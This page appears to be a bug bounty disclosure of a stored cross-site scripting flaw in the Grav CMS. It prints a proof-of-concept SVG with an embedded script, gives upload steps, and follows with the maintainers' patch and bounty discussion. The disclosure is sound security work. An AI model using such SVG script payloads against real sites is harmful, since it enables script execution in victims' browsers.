Cross-site Scripting (XSS) - Stored in getgrav/grav

Valid

Reported on

Jul 1st 2021


✍️ Description

Grav is vulnerable to XSS via bad SVG files. It is possible to upload an SVG file that contains errors after script tags.

🕵️‍♂️ Proof of Concept

SVG file content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
   <error>
</svg>
  1. Create an SVG file with the above content.
  2. Upload it through profile image update.
  3. Open the target URL.

PoC video.

💥 Impact

This vulnerability is capable of JavaScript code execution.

Renan Rocha submitted a
a year ago
Z-Old
a year ago

Admin


Hey Renan, how's it going my friend? I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the getgrav/grav team and are waiting to hear back a year ago
Renan Rocha
a year ago

Researcher


Hey Ziding, thank you !

getgrav/grav maintainer validated this vulnerability a year ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
getgrav/grav maintainer
a year ago

Maintainer


Thank you for this Renan, we went with a slightly different patch where instead of emptying the file we move it into a quarantine folder. It is less drastic of an approach and gives the admins the opportunity to review the files. Sometimes SVG sanitization might fail even if not the file is not malicious.

You can check out the commit here https://github.com/getgrav/grav/commit/8af1229f6518c496d0c49aa1c9ff3e31b110ac7a

Thanks! Djamil

Z-Old
a year ago

Admin


Thank you Djamil. Great job all round!

Djamil Legato confirmed that a fix has been merged on 8af122 5 months ago
Djamil Legato has been awarded the fix bounty
Security.php#L59 has been validated
to join this conversation